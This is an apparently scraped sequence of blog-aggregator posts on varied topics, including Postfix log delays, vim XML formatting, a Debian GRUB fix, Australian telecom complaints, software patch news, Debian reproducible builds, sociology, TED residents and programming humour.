Jan 10 10:00:00 testmtr postfix/smtp[20123]: 34A1B160852B: to=, relay=mx1.example.lan[1.2.3.4]:25, delay=82, delays=0.25/0/0.5/81, dsn=4.4.2, status=deferred (lost connection with mx1.example.lan[1.2.3.4] while sending end of data -- message may be sent more than once)

Jan 10 testmtr postfix/smtp[20123]: 34A1B160852B: to=, relay=mx1.example.lan[1.2.3.4]:25, delay=1092, delays=1091/0.2/0.8/0.25, dsn=2.0.0, status=sent

This time the first entry shows how long it took before the destination mail relay took to time out and close the connection:

delays=0.25/0/0.5/81
Therefore: 81 seconds.

The email was deferred then about 15 minutes later (1009 seconds [delays - <total delay from last attempt> ]) another attempt is made.
This time the delay is a lot larger, as the total time this email has spent on the server is a lot longer.

delay=1092, delays=1091/0.2/0.8/0.25

What is interesting though is the value of ‘a’ is now 1091, which means when an email is resent the ‘a’ value in the breakdown also includes the amount of time this email has currently spend on the system (before this attempt).

So there you go, those delays values are rather interesting and can really help solve where bottlenecks lie on your system. In the above case we obviously had some problem communicating to the destination mail relay, but worked the second time, so isn’t a problem with our system… or so I’d like to think.

Planet Linux AustraliaMatthew Oliver: Use xmllint and vim to format xml documents

If you want vim to nicely format an XML file (and a xena file in this example, 2nd line) then add this to your ~/.vimrc file:
" Format *.xml and *.xena files by sending them to xmllint
au FileType xml exe ":silent 1,$!xmllint --format --recover - 2>/dev/null"
au FileType xena exe ":silent 1,$!xmllint --format --recover - 2>/dev/null"

This uses the xmllint command to format the xml file.. useful on xml docs that aren’t formatted in the file.

Planet Linux AustraliaMatthew Oliver: Debian 6 GNU/KFreeBSD Grub problems on VirtualBox

Debian 6 was released the other day, with this release they not only released a Linux kernel version but they now support a FreeBSD version as well!
So I decided to install it under VirtualBox and check it out…

The install process went smoothly until I got to the end when it was installing and setting up grub2. It installed ok on the MBR but got an error in the installer while trying to set it up. I jumped into the console to take a look around.

I started off trying to run the update-grub command which fails silently (checking $? shows the return code of 1). On closer inspection I noticed the command created an incomplete grub config named /boot/grub/grub.cfg.new

So all we need to do is finish off this config file. So jump back into the installer and select continue without boot loader, this will pop up a message about what you must set the root partition as when you do set up a boot loader, so take note of it.. mine was /dev/ad0s5.

OK, with that info we can finish off our config file. Firstly lets rename the incomplete one:
cp /boot/grub/grub.cfg.new /boot/grub/grub.cfg

Now my /boot/grub/grub.cfg ended like:
### BEGIN /etc/grub.d/10_kfreebsd ###
menuentry 'Debian GNU/kFreeBSD, with kFreeBSD 8.1-1-amd64' --class debian --class gnu-kfreebsd --class gnu --class os {
insmod part_msdos
insmod ext2


set root='(hd0,1)'
search --no-floppy --fs-uuid --set dac05f8a-2746-4feb-a29d-31baea1ce751
echo 'Loading kernel of FreeBSD 8.1-1-amd64 ...'
kfreebsd /kfreebsd-8.1-1-amd64.gz

So I needed to add the following to finish it off (note this I’ll repeat that last part):
### BEGIN /etc/grub.d/10_kfreebsd ###
menuentry 'Debian GNU/kFreeBSD, with kFreeBSD 8.1-1-amd64' --class debian --class gnu-kfreebsd --class gnu --class os {
insmod part_msdos
insmod ext2
insmod ufs2


set root='(hd0,1)'
search --no-floppy --fs-uuid --set dac05f8a-2746-4feb-a29d-31baea1ce751
echo 'Loading kernel of FreeBSD 8.1-1-amd64 ...'
kfreebsd /kfreebsd-8.1-1-amd64.gz
set kFreeBSD.vfs.root.mountfrom=ufs:/dev/ad0s5
set kFreeBSD.vfs.root.mountfrom.options=rw
}

Note: My root filesytem was UFS, thus the ‘ufs:/dev/ad0s5′ in the mountfrom option.

That’s it, you Debian GNU/kFreeBSD should now boot successfully :)

Planet Linux AustraliaHamish Taylor: The woeful state of communications in Australia’s capital city

For those who may not know, I recently moved from Melbourne, Victoria to Canberra, Australian Capital Territory (ACT) and am now living in a house in the inner north-west. Of course, being a geek, I wanted to get the internet connected as soon as possible! After such a smooth transition I’d expected some problems and this is where they all cropped up.

In Melbourne I had an Internode ADSL connection and before I moved I called them up to relocate this service. This, of course, relied on getting an active Telstra line at the new house. I knew it would take a bit of time to relocate the service, so in the interim I bought a Telstra wi-fi internet device. This is actually a ZTE MF30 and supports up to 5 connections via wi-fi, so I can get both my iPhone and laptop on at the same time. Quite simply, this device is brilliant at what it does and I couldn’t be happier with it.

So, at the moment I’m online via the Telstra device, which is just as well really, as I soon encounter communication issue number 1: Optus.

It appears that Optus have a woeful network in Canberra. I have an iPhone 3GS, which I know can only use 850MHz and 2100MHz 3G networks. Optus uses 900MHz and 2100MHz for their 3G, so the iPhone will only work in Optus 2100MHz coverage. In Melbourne I never had a problem getting on the internet at good speeds.

When I looked at the Optus overage maps for ACT and click on “3G Single band” (the 2100MHz network coverage), it shows the inner north-west being well covered. It really isn’t. Both from home and at work in Belconnen, I can barely get two bars of GSM phone signal. The connectivity is so bad that I can barely make phone calls and send SMSs. Occasionally, I get the “Searching…” message which tells me that it has completely lost GSM connectivity. This never happened in Melbourne, where I had 4-5 bars of signal pretty much all the time.

The 3G connection drops in and out so often that I have to be standing in exactly the right location to be able to access the internet on my iPhone. Even this afternoon in Kingston in the inner south, I wasn’t able to get onto the internet and post to Twitter. I had to use the Telstra device, which hasn’t missed a beat in any location for network connectivity, to establish a connection. This really isn’t good enough for the middle of Canberra. I am seriously considering calling Optus, lodging a complaint and trying to get out of my 2 year contract (which has another 10 months to run), so I can switch over to Telstra. I never thought I’d say this, but I actually want to use a Telstra service!!!

Communications issue number 2: TransACT. From what I can find out TransACT have a cable TV network which also has telephone and internet capabilities. When this network was established about a decade ago, it was revolutionary and competitive. Today the network has been expanded to support ADSL connections, but there is no ability to get a naked service as all connections require an active phone service. Additionally, as a quick look at some of the internet connectivity plans show, after factoring in the required phone service, it is a costly service for below average download allowances.

When I moved into the house, the process of relocating the Internode ADSL service from Melbourne to Canberra triggered a visit from a Telstra technician. However, he wasn’t able to find a physical Telstra line into the house. Being an older suburb of Canberra, this house will have a Telstra cable. Or rather will have had as apparently it is not unknown for TransACT installers to cut the Telstra cables out as “You won’t need THAT anymore!”

So now I have to pay for a new cable to be installed from the house to the “Telstra network boundary” (presumably the street or nearest light pole where it can be connected to Telstra’s infrastructure). Then we have to pay again for a new Telstra connection at a cost of $299. Considering that if the Telstra cable had been left in place, the connection cost would be $55, this is turning into quite an expensive proposition just to get a naked DSL service.

All in all I am not impressed with the state of communications in Australia’s capital city, Canberra. All I can say is please, please, please bring on the National Broadband Network (NBN)!

 

 

Planet Linux AustraliaHamish Taylor: Stupidity with passwords

We all know and understand how important passwords are. We all know that we should be using strong passwords.

What’s a strong password? Something that uses:

  • lower case characters
  • UPPER CASE CHARACTERS
  • punctuation, such as !@#$%^&*()<>?”:{}+_
  • and should be 8 characters or longer

So, to put it mildly, it really annoys me when I come across services that don’t allow me to use strong passwords. If I possibly could, I’d boycott these services, but sometimes that’s just not possible.

For example, my internet banking is limited to a password of between 6-8 characters. WTF?! This is hardly a secure password policy!

Another financial service I use is limited to 15 characters and doesn’t allow most of the punctuation set. Why? Is it too difficult to extend your database validation rules to cover all of the character set?

Ironically, I didn’t have a problem with Posterous, Facebook or Twitter (and others) in using properly secure passwords. So, these free services give me a decent level of security, but Australian financial services companies can’t. It’s stupidity in the extreme.

Planet Linux AustraliaHamish Taylor: A call to “standardised user account requirements” arms

We need to have a standard for management of user accounts.

Given the number of high profile companies that have been cracked into lately, I have been going through the process of closing accounts for services I no longer use.

Many of these accounts were established when I was more trusting and included real data. However now, unless I am legally required to, I no longer use my real name or real data.

But I have been bitterly disappointed by the inability of some companies to shut down old accounts. For example, one service told me that “At this time, we do not directly delete user accounts…”. I also couldn’t change my username. Another service emailed my credentials in plain text.

To protect the privacy and security of all users, an enforceable standard needs to be established covering management of user accounts. It needs to be applied across the board to all systems connected to the internet. I know how ridiculous this sounds, and that many sites wouldn’t use it, but high profile services should be able to support something like this.

Included in the standard should be:

  • the ability to completely delete accounts (unless there’s some kind of legislative requirement to keep, and then they should only retain the data that is absolutely necessary)
  • the ability to change all details including usernames
  • a requirement to encrypt and salt the password (that covers the credentials in plain text issue noted above)
  • determine the minimum practicable data set that you need to maintain an account and only ask for that. If there’s no need to retain particular account details, don’t collect them. For example, I’ve never been contacted by phone by any of these companies so why was I forced to enter a phone number?

This is a short list from my frustrations today. Please comment to help me flesh this out with other things that should be done on a properly supported user account management system.

And please let me know of your experiences with companies that were unable to properly protect your privacy and security.

Planet Linux AustraliaHamish Taylor: Back to WordPress!

I’ve given up on Blogger and returned to WordPress. I’ll update the look and feel from the defaults and try to update it a bit more often!

,

Krebs on SecurityAdobe, Microsoft Push Critical Updates

Adobe has issued security updates to fix weaknesses in its PDF Reader and Cold Fusion products, while pointing to an update to be released later this week for its ubiquitous Flash Player browser plugin. Microsoft meanwhile today released 16 update bundles to address dozens of security flaws in Windows, Internet Explorer and related software.

Microsoft’s patch batch includes updates for “zero-day” vulnbrokenwindowserabilities (flaws that attackers figure out how to exploit before before the software maker does) in Internet Explorer (IE) and in Windows. Half of the 16 patches that Redmond issued today earned its “critical” rating, meaning the vulnerabilities could be exploited remotely through no help from the user, save for perhaps clicking a link, opening a file or visiting a hacked or malicious Web site.

According to security firm Shavlik, two of the Microsoft patches tackle issues that were publicly disclosed prior to today’s updates, including bugs in IE and the Microsoft .NET Framework.

Anytime there’s a .NET Framework update available, I always uncheck those updates to install and then reboot and install the .NET updates; I’ve had too many .NET update failures muddy the process of figuring out which update borked a Windows machine after a batch of patches to do otherwise, but your mileage may vary.

On the Adobe side, the pending Flash update fixes a single vulnerability that apparently is already being exploited in active attacks online. However, Shavlik says there appears to be some confusion about how many bugs are fixed in the Flash update.

“If information gleaned from [Microsoft’s account of the Flash Player update] MS16-064 is accurate, this Zero Day will be accompanied by 23 additional CVEs, with the release expected on May 12th,” Shavlik wrote. “With this in mind, the recommendation is to roll this update out immediately.”

brokenflash-a

Adobe says the vulnerability is included in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS, and that the flaw will be fixed in a version of Flash to be released May 12.

As far as Flash is concerned, the smartest option is probably best to hobble or ditch the program once and for all — and significantly increase the security of your system in the process. I’ve got more on that approach (as well as slightly less radical solutions ) in A Month Without Adobe Flash Player.

If you use Adobe Reader to display PDF documents, you’ll need to update that, too. Alternatively, consider switching to another reader that is perhaps less targeted. Adobe Reader comes bundled with a number of third-party software products, but many Windows users may not realize there are alternatives, including some good free ones. For a time I used Foxit Reader, but that program seems to have grown more bloated with each release. My current preference is Sumatra PDF; it is lightweight (about 40 times smaller than Adobe Reader) and quite fast.

Finally, if you run a Web site that in any way relies on Adobe’s Cold Fusion technology, please update your software soon. Cold Fusion vulnerabilities have traditionally been targeted by cyber thieves to compromise countless online shops.

Planet DebianReproducible builds folks: Reproducible builds: week 54 in Stretch cycle

What happened in the Reproducible Builds effort between May 1st and May 7th 2016:

Media coverage

There has been a surprising tweet last week: "Props to @FiloSottile for his nifty gvt golang tool. We're using it to get reproducible builds for a Zika & West Nile monitoring project." and to our surprise Kenn confirmed privately that he indeed meant "reproducible builds" as in "bit by bit identical builds". Wow. We're looking forward to learn more details about this; for now we just know that they are doing this for software quality reasons basically.

Two of the four GSoC and Outreachy participants for Reproducible builds posted their introductions to Planet Debian:

Toolchain fixes and other upstream developments

dpkg 1.18.5 was uploaded fixing two bugs relevant to us:

  • #719845 (make the file order within the {data,control}.tar.gz .deb members deterministic)
  • #819194 (add -fdebug-prefix-map to the compilers options)

This upload made it necessary to rebase our dpkg on the version on sid again, which Niko Tyni and Lunar promptly did. Then a few days later 1.18.6 was released to fix a regression in the previous upload, and Niko promptly updated our patched version again. Following this Niko Tyni found #823428: "dpkg: many packages affected by dpkg-source: error: source package uses only weak checksums".

Alexis Bienvenüe worked on tex related packages and SOURCE_DATE_EPOCH:

  • Alexis uploaded texlive-bin to our repo improving the existing patches.
  • pdftex upstream discussion by Alexis Bienvenüe began at tex-k mailing list to make \today honour SOURCE_DATE_EPOCH. Upstream already commited enhanced versions of the proposed patches.
  • Similar discussion on the luatex side at luatex mailing list. Upstream is working on it, and already committed some changes.

Emmanuel Bourg uploaded jflex/1.4.3+dfsg-2, which removes timestamps from generated files.

Packages fixed

The following 285 packages have become reproducible due to changes in their build dependencies (mostly from GCC honouring SOURCE_DATE_EPOCH, see the previous week report): 0ad abiword abcm2ps acedb acpica-unix actiona alliance amarok amideco amsynth anjuta aolserver4-nsmysql aolserver4-nsopenssl aolserver4-nssqlite3 apbs aqsis aria2 ascd ascii2binary atheme-services audacity autodocksuite avis awardeco bacula ballerburg bb berusky berusky2 bindechexascii binkd boinc boost1.58 boost1.60 bwctl cairo-dock cd-hit cenon.app chipw ckermit clp clustalo cmatrix coinor-cbc commons-pool cppformat crashmail crrcsim csvimp cyphesis-cpp dact dar darcs darkradiant dcap dia distcc dolphin-emu drumkv1 dtach dune-localfunctions dvbsnoop dvbstreamer eclib ed2k-hash edfbrowser efax-gtk efax exonerate f-irc fakepop fbb filezilla fityk flasm flightgear fluxbox fmit fossil freedink-dfarc freehdl freemedforms-project freeplayer freeradius fxload gdb-arm-none-eabi geany-plugins geany geda-gaf gfm gif2png giflib gifticlib glaurung glusterfs gnokii gnubiff gnugk goaccess gocr goldencheetah gom gopchop gosmore gpsim gputils grcompiler grisbi gtkpod gvpe hardlink haskell-github hashrat hatari herculesstudio hpcc hypre i2util incron infiniband-diags infon ips iptotal ipv6calc iqtree jabber-muc jama jamnntpd janino jcharts joy2key jpilot jumpnbump jvim kanatest kbuild kchmviewer konclude krename kscope kvpnc latexdiff lcrack leocad libace-perl libcaca libcgicc libdap libdbi-drivers libewf libjlayer-java libkcompactdisc liblscp libmp3spi-java libpwiz librecad libspin-java libuninum libzypp lightdm-gtk-greeter lighttpd linpac lookup lz4 lzop maitreya meshlab mgetty mhwaveedit minbif minc-tools moc mrtrix mscompress msort mudlet multiwatch mysecureshell nifticlib nkf noblenote nqc numactl numad octave-optim omega-rpg open-cobol openmama openmprtl openrpt opensm openvpn openvswitch owx pads parsinsert pcb pd-hcs pd-hexloader pd-hid pd-libdir pear-channels pgn-extract phnxdeco php-amqp php-apcu-bc php-apcu php-solr pidgin-librvp plan plymouth pnscan pocketsphinx polygraph portaudio19 postbooks-updater postbooks powertop previsat progressivemauve puredata-import pycurl qjackctl qmidinet qsampler qsopt-ex qsynth qtractor quassel quelcom quickplot qxgedit ratpoison rlpr robojournal samplv1 sanlock saods9 schism scorched3d scummvm-tools sdlbasic sgrep simh sinfo sip-tester sludge sniffit sox spd speex stimfit swarm-cluster synfig synthv1 syslog-ng tart tessa theseus thunar-vcs-plugin ticcutils tickr tilp2 timbl timblserver tkgate transtermhp tstools tvoe ucarp ultracopier undbx uni2ascii uniutils universalindentgui util-vserver uudeview vfu virtualjaguar vmpk voms voxbo vpcs wipe x264 xcfa xfrisk xmorph xmount xyscan yacas yasm z88dk zeal zsync zynaddsubfx

Last week the 1000th bug usertagged "reproducible" was fixed! This means roughly 2 bugs per day since 2015-01-01. Kudos and huge thanks to everyone involved! Please also note: FTBFS packages have not been counted here and there are still 600 open bugs with reproducible patches provided. Please help bringing that number down to 0!

The following packages have become reproducible after being fixed:

Some uploads have fixed some reproducibility issues, but not all of them:

Uploads which fix reproducibility issues, but currently FTBFS:

Patches submitted that have not made their way to the archive yet:

  • #823174 against ros-pluginlib by Daniel Shahaf: use printf instead of echo to fix implementation-specific behavior.
  • #823239 against gspiceui by Alexis Bienvenüe: sort list of object files for linking binary.
  • #823241 against unhide by Alexis Bienvenüe: sort list of source files passed to compiler.
  • #823393 against kdbg by Alexis Bienvenüe: fix changelog encoding and call grep in text mode.
  • #823452 against khronos-opengl-man4 by Daniel Shahaf: sort file lists deterministically.

Package reviews

54 reviews have been added, 6 have been updated and 44 have been removed in this week.

18 FTBFS bugs have been reported by Chris Lamb, James Cowgill and Niko Tyni.

diffoscope development

Thanks to Mattia, diffoscope 52~bpo8+1 is available in jessie-backports now.

tests.reproducible-builds.org

  • All packages from all tested suites have finally been built on i386.
  • Due to GCC supporting SOURCE_DATE_EPOCH sid/armhf has finally reached 20k reproducible packages and sid/amd64 has even reached 21k reproducible packages. (These numbers are about our test setup. The numbers for the Debian archive are still all 0. dpkg and dak need to be fixed to get the numbers above 0.)
  • IRC notifications for non-Debian related jenkins job results go to #reproducible-builds now, while Debian related notifications stay on #debian-reproducible. (h01ger)
  • profitbricks-build4-amd64 has been fully set up now and is running 398 days in the future. Next: update coreboot/OpenWrt/Fedora/Archlinux/FreeBSD/NetBSD scripts to use it. Help (in form of patches to existing shell scripts) very much welcome! (Other help is much welcome (and needed) too, but some things might take longer to merge or explain…)

Misc.

This week's edition was written by Reiner Herrmann, Holger Levsen and Mattia Rizzolo and reviewed by a bunch of Reproducible builds folks on IRC. Mattia also wrote a small ikiwiki macro for this blog to ease linking reproducible issues, packages in the package tracker and bugs in the Debian BTS.

Google Adsense[eBook] Learn how to increase audience engagement

Did you know that roughly 61% of users abandon a site if they don't find what they’re looking for right away?1 As hard as you work to get visitors to your site, you have to work even harder to keep them there.


Unfortunately, there isn’t a clever hack to keeping your users engaged. However, if you understand the intent of your users and provide unique content that’s relevant to their interests, you’ll be on your way to increasing engagement on your site.


Download our guide to audience engagement to learn more about best practices and tips to drive better results for both your users and business. Get your free copy today.



We’d love to hear your feedback on how this guide, connect with us on  Google+ and Twitter using #AdSenseGuide.




Posted by Jay Castro
from the AdSense team




1) Think with Google, What users want from mobile sites

Sociological Images“I Feel Like” and the New Individualizing of Morality

Historian Molly Worthen is fighting tyranny, specifically the “tyranny of feelings” and the muddle it creates. We don’t realize that our thinking has been enslaved by this tyranny, but alas, we now speak its language. Case in point:

“Personally, I feel like Bernie Sanders is too idealistic,” a Yale student explained to a reporter in Florida.

Why the “linguistic hedging” as Worthen calls it? Why couldn’t the kid just say, “Sanders is too idealistic”? You might think the difference is minor, or perhaps the speaker is reluctant to assert an opinion as though it were fact. Worthen disagrees.

“I feel like” is not a harmless tic. . . . The phrase says a great deal about our muddled ideas about reason, emotion and argument — a muddle that has political consequences.

The phrase “I feel like” is part of a more general evolution in American culture. We think less in terms of morality – society’s standards of right and wrong – and more in terms individual psychological well-being. The shift from “I think” to “I feel like” echoes an earlier linguistic trend when we gave up terms like “should” or “ought to” in favor of “needs to.” To say, “Kayden, you should be quiet and settle down,” invokes external social rules of morality. But, “Kayden, you need to settle down,” refers to his internal, psychological needs. Be quiet not because it’s good for others but because it’s good for you.

4

Both “needs to” and “I feel like” began their rise in the late 1970s, but Worthen finds the latter more insidious. “I feel like” defeats rational discussion. You can argue with what someone says about the facts. You can’t argue with what they say about how they feel. Worthen is asserting a clear cause and effect. She quotes Orwell: “If thought corrupts language, language can also corrupt thought.” She has no evidence of this causal relationship, but she cites some linguists who agree. She also quotes Mark Liberman, who is calmer about the whole thing. People know what you mean despite the hedging, just as they know that when you say, “I feel,” it means “I think,” and that your are not speaking about your actual emotions.

The more common “I feel like” becomes, the less importance we may attach to its literal meaning. “I feel like the emotions have long since been mostly bleached out of ‘feel that,’ ” …

Worthen disagrees.  “When new verbal vices become old habits, their power to shape our thought does not diminish.”

“Vices” indeed. Her entire op-ed piece is a good example of the style of moral discourse that she says we have lost. Her stylistic preferences may have something to do with her scholarly ones – she studies conservative Christianity. No “needs to” for her. She closes her sermon with shoulds:

We should not “feel like.” We should argue rationally, feel deeply and take full responsibility for our interaction with the world.

——————————-

Originally posted at Montclair SocioBlog. Graph updated 5/11/16.

Jay Livingston is the chair of the Sociology Department at Montclair State University. You can follow him at Montclair SocioBlog or on Twitter.

(View original at https://thesocietypages.org/socimages)

Chaotic IdealismSchool bus alarms

In the news:
California bill targets school bus deaths
SB1072 would require school buses to have child safety alarms. The alarm sounds when the engine is turned off and requires the bus driver to walk to the back of the bus to turn it off.

Paul Lee was a 19 year old autistic student who died of heatstroke when he was left alone in a school bus on a hot day. It's well-known that babies and pets can die of heatstroke when left in cars, but so do disabled adults--often.

The alarm idea sounds good at first glance, but I don't think these people are thinking it through.

What comes to mind when you think about alarms? Annoying. Loud. Harsh. Maybe even scary. A school bus driver would want to turn off that alarm ASAP, not just because it annoys the driver, but because it can literally cause pain to every student with even a little auditory sensitivity.

So here's the likely scenario.
1. Driver parks bus.
2. Driver turns off engine, triggering alarm.
3. Driver turns off alarm.
4. Driver helps children off bus.

Notice the order that happens in? The alarm isn't going to force the driver to check for children left in the bus. The driver will turn off the alarm, and THEN get the children off, because the alarm is annoying. There will be no enforced checking of seats, just an extra step to distract the driver from the passengers.

Does it really take a human factors degree to understand this? People behave in predictable ways. We're trained to respond to alarms, and this alarm would train the driver to respond by turning it off as soon as possible. Even if the driver insists on leaving the alarm blaring until the bus is empty, that's just going to torture any auditory-sensitive children on the bus which, since this is a special-needs bus, is going to be quite a few of them.

Don't get me wrong; I'm firmly against par-boiling autistics in school buses. I just don't think this is a good way to prevent it. There have to be better ways.

Anything that required the driver to physically touch every seat after the children left would be adequate. Require the driver to re-buckle seat belts, put up hand rests, anything that's easier to do after the children leave the bus. Doesn't matter what it is, though it can probably also function as leaving the bus in an orderly state. Alarms, though... I don't see how they would even help.

TEDMeet our first class of TED Residents

TEDResidents_Blog

An idea worth spreading doesn’t just magically appear out of thin air. Instead, it needs a long incubation period, a sometimes frustrating — and often exciting — trial and error of creation, failure and innovation.

On April 18, TED welcomed its first-ever class of the TED Residency program, an in-house community of 28 bright minds who are tackling ambitious projects and making meaningful change.

This group of thinkers will spend the next four months in a collaborative space, learning with and from each other on ideas that address …

  • How to explain complex scientific concepts
  • The personal stories of migrants
  • Violence prevention in at-risk communities
  • How to make the most of personal connections in a tech-heavy world
  • The history of the Internet
  • Inclusion in the fashion world
  • Building the digital Disney of Africa
  • Frictionless housing for a mobile society

… among many other fascinating subjects

At the end of the session, the residents will give a TED Talk about their ideas in the TED office theater. Read more about each resident below:

Daniel Ahmadizadeh is working with artificial intelligence to revolutionize how consumers are informed and make choices. He co-founded Riley, a chatbot concierge service for the real-estate business.

Piper Anderson is a writer and creative strategist who has spent the past 15 years working to end mass criminalization and incarceration. She recently launched the National Mass Story Campaign, which will host participatory storytelling events in 20 cities to catalyze more restorative and transformative approaches to justice.

Isabel Behncke is an Oxford field primatologist from Chile who is working on the evolutionary roots of social behavior in humans and other animals. She is creating a show on the science of joy that blurs boundaries among theater, poetry and cutting-edge science.

Susan Bird is CEO of Wf360, a global consultancy that promotes conversation not as a “soft skill,” but as a strategic tool. She is developing a podcast about the art of face-to-face conversation, which has become something of a luxury in this age of electronic communication.

Artist and traveler Reggie Black started Sticky Inspiration as an online project designed to motivate others through thought-provoking quotes distributed daily on Post-Its left in public spaces. Now he’s ready to expand offline.

Sashko Danylenko is a Ukraine-based filmmaker whose animated films explore wonder and curiosity. Currently, he’s working on a film that documents cities around the world through by focusing on their bicyclists. 

Tanya Dwyer is an attorney and social entrepreneur in Brooklyn who works to promote inclusive capitalism and economic justice. She wants to help establish a living-wage business park in Crown Heights that is cooperatively owned by neighborhood residents and stakeholders.

Laura Anne Edwards is building DATA OASIS, a dynamic index of valuable data sets, many of which are taxpayer–funded and technically “open” but in practice, extremely difficult to locate and access. DATA OASIS will reduce redundant research and provide a forum for idea sharing.

Rob Gore, an academic emergency medicine physician based in Brooklyn, leads KAVI (Kings Against Violence Initiative), a youth empowerment and violence prevention program that has been running for the past five years. He is working to transform health care in marginalized populations.

Che Grayson is a filmmaker and comic book creator whose multimedia project Rigamo, a comic series and short film about a young girl whose tears bring people back to life, helped her overcome her grief at the death of a beloved aunt. She wants to explore using these forms of storytelling to tackle other tough subjects, heal, and inspire.

Bethany Halbreich runs Paint the World, an organization that wants to make opportunities for creativity ubiquitous. Paint the World facilitates public art projects in underserved communities; the resulting pieces are sold, the profits fund more kits and supplies for areas in need.

Sarah Hinawi is the co-founder and director of Purpl, a small-business incubator that focuses on the person rather than the business. Building upon two decades in the field of human development, she is now examining what leadership training looks like in the gig economy.

Designer and writer DK Holland has spent the past two and a half years in high-poverty public elementary school classrooms in Brooklyn, developing free after-school micro-democracies run by the kids, for kids, so they can learn better. She is working with her team of progressive educators to develop the kids’ ideas into  toolkits—notably the Learning Wall, Portfolio Pockets, and Democracy in a Box—to offer to other schools.

Liz Jackson is the founder and chief advocacy officer for the Inclusive Fashion & Design Collective, the first fashion trade association for businesses and designers serving the needs of people with disabilities. Her mission is to introduce the world to inclusive design.

Ayana Elizabeth Johnson is a marine biologist and policy expert who advocates zoning the ocean as we do land, so we can use the sea without using it up. As executive director of the Waitt Institute, she led the Caribbean’s first successful island-wide ocean zoning project, resulting in one third of Barbuda’s coastal waters being protected, and went on to launch similar initiatives on other islands. 

Jonathan Kalan and Michael Youngblood want to redefine the notion of home and its relation to work. Aimed at millennials who care more about mobility than about owning real estate, their “global lease” aims to let subscribers stay “location-independent.”

Brian McCullough is the creator of the Internet History Podcast, an oral history of the internet; he’s now telling the stories of Web 2.0. 

Christia Mercer is a full-time Columbia philosophy professor and part-time activist. She plans to examine radically different answers to hard questions that people have given throughout history and across cultures and then to show their relevance to modern thinking.

Ted Myerson is a co-founder of Anonos, a Big Privacy technology company that enables data to be more readily collected, shared, and combined, potentially enabling breakthroughs in personalized and precision medicine. 

As a tap dancer, Andrew Nemr has lived the oral tradition of American Vernacular Dance. Cofounder (with the late, great Gregory Hines) of the Tap Legacy Foundation, he is now working to transfer that archive online. 

Cavaughn Noel is an experienced digital strategist and tech entrepreneur who is broadening the horizons of urban youth by creating a platform that exposes them to technology, via hip-hop, fashion, and travel.

Torin Perez is building a digital platform for sharing children’s stories from Africa and the diaspora. The DreamAfrica app contains multimedia content from established publishers, independent content creators, and children.

Amanda Phingbodhipakkiya is a Columbia-trained neuroscientistturnedart director. Her organization recruits designers and researchers to collaborate on visual media that demystify academic science.

After her Flappy Bird in a Box video went viral, Fawn Qiu wondered how else she could hook teens on engineering.  By creating an open-source model for designing fun projects with low-cost, everyday objects, she hopes to encourages a new generation of engineers.  

Vanessa Valenti is the co-founder of FRESH, a next-generation speakers’ bureau focused on diversifying public speaking. She’s studying who gets on the world’s most influential stages and what their experiences are once they get there. Her goal is to redesign thought leadership.

Kimberlee Williams is the CEO of FEMWORKS, a communications agency based in Newark, NJ.  She wants to transform local economies by enrolling African-American consumers in buy-local campaigns.

Sheryl Winarick‘s work as an immigration lawyer gives her a unique opportunity to know intimately the people she serves, the reasons they choose to migrate, and the challenges they face. She aims to create an online storytelling platform to humanize “the other,” and to cultivate a sense of individual and collective responsibility.


Worse Than FailureAnnouncements: Code Offsets - Version 2.0

The Daily WTF exists to point out coding horrors, but a few years ago we also took a swing at trying to prevent bad code. Long time readers might remember our 2009 initiative, Code Offsets. We are pleased to announce that Code Offsets are back, redesigned, and ready for you to make a difference (or just to make fun of your coworkers).

Babbage Offset

Essentially, the idea is simple. Code Offsets are a novel way to offset your (or your co-workers') crap code. Like carbon offsets, which aim to reduce emissions of carbon dioxide/greenhouse gases to compensate, or offset emissions made elsewhere, our Code Offsets are used to offset the bad code that already exists.

When you purchase a pack of Code Offsets, the proceeds go to a featured nonprofit group that helps promote good code through education, donations, or open source software.

At launch that organization is TECH CORPS. They are an amazing nonprofit organization dedicated to ensuring K-12 students have equal access to technology programs, skills and resources that enhance early learning and prepare them for college and career.

The Code Offsets themselves are bills that feature some of the most notable characters from the history of computing, the founders of the discipline from Babbage to Hopper.

Offsets

We’ve designed nine different bills, each offsetting a select amount of bad code. The bills available range from one line, all the way up to one thousand lines. They come in packs so you can keep a few for yourself, but still pass some out to any Paulas around the office.

Also to celebrate the release of the project, we printed up some stickers for the first 1000 orders! (Mainly because Alex loves stickers)

[Advertisement] Infrastructure as Code built from the start with first-class Windows functionality and an intuitive, visual user interface. Download Otter today!

CryptogramChildren of Spies

Fascinating story of Tim and Alex Foley, the children of Russian spies Donald Heathfield and Tracey Foley.

Worse Than FailureCoded Smorgasbord: Finding a Path

Readers of TDWTF know all too well that dates are hard. Strings are also hard. You know what else is hard? File paths.

Like dates, and strings, most languages these days have libraries to simplify parsing filepaths. For example, in Python, you can use the os.path module to parse out the directory structure, the file, and its extension without too much effort.

As Chris discovered, though, some people like that effort. Why use things like os.path when you’ve got Python’s super-powered slice operator for splitting the string apart:

samp = file[file.find('intFiles')+9:].split("/")[0]
fName = file.split("/")[-1]

The second line is the one that pulls off the file name- split into an array, grab the last element- and it’ll work fine, if not efficiently.

By the same token, the preceding line isn’t wrong, it’s just ugly. It finds the starting point of the string “intFiles” in the filename, jumps just past it, and then splits on slashes, grabbing the first item. And frankly, what would we have rather the original developer used? A built in function?

It’s ugly, but not the worst sin. What if we started with a language that was already ugly? What about Objective-C? Objective-C, especially when used on MacOS or iOS, is an ugly beast that mixes high-level abstractions with low-level APIs, and stubbornly insists on using Smalltalk-style message passing for calling methods of objects.

Paul’s team-mate needed to find the file name from the path. There’s a lovely built-in function called lastPathComponent that makes this easy, but again- Paul’s team-mate wasn’t interested in easy.

+ (__strong NSString*) getFilename: (NSString*) file
{
    NSString* Result = @"";
    @try
    {
        if ( [mbUtilis hasContent: file ] )
        {
            Result = file;

            for ( NSInteger i = [file length] -1; i >= 0; i--)
            {
                UniChar c = [file characterAtIndex: i];
                if ( c == '/' )
                {
                    if ( i != [file length] -1 )
                    {
                        Result = [file substringFromIndex: i +1];
                    }

                    break;
                }
            }
        }
    }
    @catch (NSException *e)
    {
        [mbApi logException: @"mbUtilis.getFilename" exception: e];
    }
    @finally
    {
        // TODO
    }

    return Result;
}

This, at least, does a reverse search, walking the string in reverse until it finds a slash. Then it chops off that portion of the string and stuffs it into result. The part that gets me isn’t the path manipulation. It’s why not just return the result from inside the for loop? Why a break? Why stuff return Result at the end of the function if you’re not going to do anything with it?

